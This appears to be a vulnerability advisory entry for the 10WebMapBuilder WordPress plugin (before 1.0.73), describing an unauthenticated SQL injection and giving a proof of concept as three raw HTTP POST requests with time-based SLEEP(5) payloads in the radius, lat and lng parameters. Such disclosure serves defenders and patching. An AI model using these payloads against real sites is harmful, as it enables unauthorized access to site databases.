10WebMapBuilder < 1.0.73 - Unauthenticated SQLi

2023-02-2000:00:00

Daniel Krohmer

wpscan.com

10webmapbuilder

sql injection

ajax action

unauthenticated users

security vulnerability

wordpress plugin

0.003 Low

EPSS

Percentile

70.7%

JSON

The plugin does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection

PoC

Note: /2022/12/29/map/ is page/post where the Google_Maps_WD is embed POST /2022/12/29/map/ HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 85 radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&lat;=0.0&lng;=0.0&distance;_in=km POST /2022/12/29/map/ HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 171 radius=1&lat;=0.0))))+AS+distance+FROM+wp_gmwd_markers+as+T_MARKERS+where+T_MARKERS.published=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)–+)&lng;=0.0&distance;_in=km POST /2022/12/29/map/ HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 171 radius=1&lat;=0.0&lng;=0.0))))+AS+distance+FROM+wp_gmwd_markers+as+T_MARKERS+where+T_MARKERS.published=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)–+)&distance;_in=km

CPENameOperatorVersion
wd-google-mapslt1.0.73

CPE	Name	Operator	Version
	wd-google-maps	lt	1.0.73

References

bulletin.iese.de/post/wd-google-maps_1-0-72_1

0.003 Low

EPSS

Percentile

70.7%

JSON

Related for WPVDB-ID:33AB1FE2-6611-4F43-91BA-52C56F02ED56